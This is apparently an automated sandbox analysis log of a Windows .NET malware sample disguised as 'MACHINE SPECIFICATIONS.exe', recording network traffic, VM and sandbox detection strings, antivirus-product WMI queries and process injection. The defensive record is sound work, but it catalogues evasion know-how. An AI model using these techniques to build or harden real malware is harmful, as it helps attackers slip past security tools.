                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49750
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 6376, type: MEMORYSTR
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.268722356.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe TID: 6400Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe TID: 6072Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe TID: 6072Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWindow / User API: threadDelayed 3238Jump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWindow / User API: threadDelayed 5206Jump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000003.342608812.0000000006BA5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\EnumNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WWW /c Microsoft-Hyper-V-Common-Drivers-Package
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                        Source: MACHINE SPECIFICATIONS.exeBinary or memory string: Q2ljJWprY2t7ITWRsdk1xY2pLYWtlYmhifFZ4fmdxZ395fw==AJkJqYmprY2t7KUxiYHlrfXl/dT06Ow==9dG5tb1dxdG54Wm97bX9ve39jIyc=ITWRsdk1xY2pNcX55bW56XXV1UXt1e3hydA==9RXl2cWVmcicuW29vLE5mbn5/d38=ITWRsdk1xY2pNcX55bW56SGJ0d31XfXd5dnx2ARXl2cWVmcicuTnhuaWMuTHhwfH1xeQ==ITWRsdk1xY2pNcX55bW56TXxkd1B8dHh5fXU=9RXl2cWVmcicuS2Z+aS1NZ3F/fHZ49dG5tb1dxdG54Wm97bX9ve39jIyU=1TWRsdk1xY2pKe2NsZHlgamNi)JkNwamNtcmltenklIiM=1TWRsdk1xY2pLZmR/fmx9ew==!JkJtbXB3Z3R8JyQl1TWRsdk1xY2pbaH5+fmx6Zn9/)JlJjd3F3Z3NhZmQlIiM=ATWRsdk1xY2pPaGdmbU5hfWJ0cWd9eng=9JkZjbmlkJkRne3hub3lnYH4/PD0=9dG5tb1dxdG54Wm97bX9ve39jJw==9TWRsdk1xY2pAWkZNZWF6amJ4fHQ=1JklRTyRDb2t8bHhiYmogIT4=9TWRsdk1xY2pAfG9GY2lnaXl0YA==1SHRnIyJIaWNhb2NufiMgIQ==)TWRsdk1xY2pNb2xub3l9
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: MACHINE SPECIFICATIONS.exeBinary or memory string: RXl2cWVmcicuW29vLE5mbn5/d38=
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                        Source: MACHINE SPECIFICATIONS.exeBinary or memory string: RXl2cWVmcicuTnhuaWMuTHhwfH1xeQ==
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000003.342608812.0000000006BA5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareU4X6_KOCWin32_VideoControllerTCGRV46UVideoController120060621000000.000000-000..913.3.display.infMSBDAKMRWUGE3PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsYFLP8K4C~
                        Source: MACHINE SPECIFICATIONS.exeBinary or memory string: RXl2cWVmcicuS2Z+aS1NZ3F/fHZ4
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        .NET source code references suspicious native API functions
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/XZCW51nE.csReference to suspicious API methods: ('nZGFXFr9', 'GetProcAddress@kernel32'), ('nBIDpmm9', 'LoadLibrary@kernel32')
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/XZCW51nE.csReference to suspicious API methods: ('nZGFXFr9', 'GetProcAddress@kernel32'), ('nBIDpmm9', 'LoadLibrary@kernel32')
                        Source: 0.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/XZCW51nE.csReference to suspicious API methods: ('nZGFXFr9', 'GetProcAddress@kernel32'), ('nBIDpmm9', 'LoadLibrary@kernel32')
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.7.unpack, E6ou21sp/XZCW51nE.csReference to suspicious API methods: ('nZGFXFr9', 'GetProcAddress@kernel32'), ('nBIDpmm9', 'LoadLibrary@kernel32')
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.f80000.1.unpack, E6ou21sp/XZCW51nE.csReference to suspicious API methods: ('nZGFXFr9', 'GetProcAddress@kernel32'), ('nBIDpmm9', 'LoadLibrary@kernel32')
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.10.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.400000.0.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.5.unpack, E6ou21sp/XZCW51nE.csReference to suspicious API methods: ('nZGFXFr9', 'GetProcAddress@kernel32'), ('nBIDpmm9', 'LoadLibrary@kernel32')
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.3.unpack, E6ou21sp/XZCW51nE.csReference to suspicious API methods: ('nZGFXFr9', 'GetProcAddress@kernel32'), ('nBIDpmm9', 'LoadLibrary@kernel32')
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/XZCW51nE.csReference to suspicious API methods: ('nZGFXFr9', 'GetProcAddress@kernel32'), ('nBIDpmm9', 'LoadLibrary@kernel32')
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/XZCW51nE.csReference to suspicious API methods: ('nZGFXFr9', 'GetProcAddress@kernel32'), ('nBIDpmm9', 'LoadLibrary@kernel32')
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeMemory written: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess created: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
